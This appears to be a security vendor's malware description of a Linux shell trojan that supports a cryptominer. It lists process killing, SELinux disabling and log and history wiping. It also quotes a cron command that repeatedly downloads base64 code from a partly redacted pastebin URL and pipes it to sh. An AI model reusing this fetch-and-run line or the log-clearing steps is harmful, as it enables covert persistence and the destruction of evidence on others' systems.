Trojan.SH.SQUELL.CB

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Process Termination

This Trojan terminates the following processes if found running in the affected system's memory:

• Processes that contains the following strings in its commandline:
  
  • stratum

Other Details

This Trojan does the following:

• It resets the IP policy table.
• It adds rules to block outgoing connections via ports 3333, 5555, 7777, 9999.
• It puts SELinux in permissive mode and disables SELinux by appending "SELINUX=disabled" to /etc/sysconfig/selinux..
• It clears PageCache, dentries and inodes.
• It clears the following objects:
  • history
  • /var/spool/mail/root
  • /var/log/wtmp
  • /var/log/secure
  • /root/.bash_history
• It creates the following cron job to enable automatic execution of update.sh:
  • Path: '/var/spool/cron/crontabs/'"$USER"
    Schedule: Every 15 minutes
    Command: "*/15 * * * * ((wget -q -O- https://pastebin.com/raw/{BLOCKED}tb || curl -fsSL https://pastebin.com/raw/{BLOCKED}tb) | base64 -d) | sh" > cron.d 2>&1
• Tries to connect to a local IP address using SSH without password. Once connected it will try to connect to the following URL:
  
  • https://pastebin.com/raw/{BLOCKED}tb
• Executes the following files if not found running in the system:
  
  • {Directory}/mysqli
  • {Directory}/mysqlc
• Checks the presence of /tmp/.mysqli/config.json for the miner to execute.
• Drops a copy of itself to the following folders:
  
  • /etc/init.d/in